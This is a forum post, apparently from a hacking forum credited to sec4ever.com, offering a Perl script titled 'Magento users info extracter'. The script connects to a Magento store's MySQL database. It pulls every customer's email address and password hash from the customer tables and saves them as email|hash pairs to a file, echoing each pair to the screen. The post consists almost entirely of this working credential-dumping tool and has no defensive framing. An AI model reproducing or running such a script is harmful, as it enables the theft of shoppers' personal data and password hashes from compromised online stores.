13 Years of Service
24%
# Magento users info extracter
#© sec4ever.com
[HIDE-THANKS]
Code:
>#!/usr/bin/perl
# Magento users info extracter
#(c) sec4ever.com
use DBI;
print qq{
[+] Magento users info extracter
[+] (c) sec4ever.com
};
$host = "host";
$user = "user";
$pass = q{pass};
$db = "db";
$save = "out.txt"; # output
$ver = 1;#verbosity
$dbh = DBI->connect("DBI:mysql:$db;host=$host", $user, $pass) or die $!;
&iinfo;
print "[+] Info count: ".$count."\n";
print "[+] Saving to: ".$save."\n\n";
open(save,">".$save) or die $!;
while(1)
{
$i++;
if (ginfo($i))
{
$l++;
print save $email."|".$pass."\n";
print "\t[$l] ".$email."|".$pass."\n" if $ver;
}
if ($l == $count){
$passq->finish();
$emailq->finish();
last;
}
}
close(save);
print "[+] d0ne extracting\n";
$dbh->disconnect();
sub iinfo
{
$countq = $dbh->prepare('SELECT count(email) from customer_entity');
$countq->execute();
$count = $countq->fetchrow_array();
$entypeq = $dbh->prepare("select entity_type_id from eav_entity_type where entity_type_code = \'customer\'");
$entypeq->execute();
$entype = $entypeq->fetchrow_array();
$attrq = $dbh->prepare("select attribute_id from eav_attribute where attribute_code = \'password_hash\' and entity_type_id = \'$entype\'");
$attrq->execute();
$attr = $attrq->fetchrow_array();
}
sub ginfo {
my $i = $_[0];
$passq = $dbh->prepare("select value from customer_entity_varchar where attribute_id = \'$attr\' and entity_id = \'$i\'");
$passq->execute();
$pass = $passq->fetchrow_array();
$emailq = $dbh->prepare("select email from customer_entity where entity_id = \'$i\'");
$emailq->execute();
$email = $emailq->fetchrow_array();
}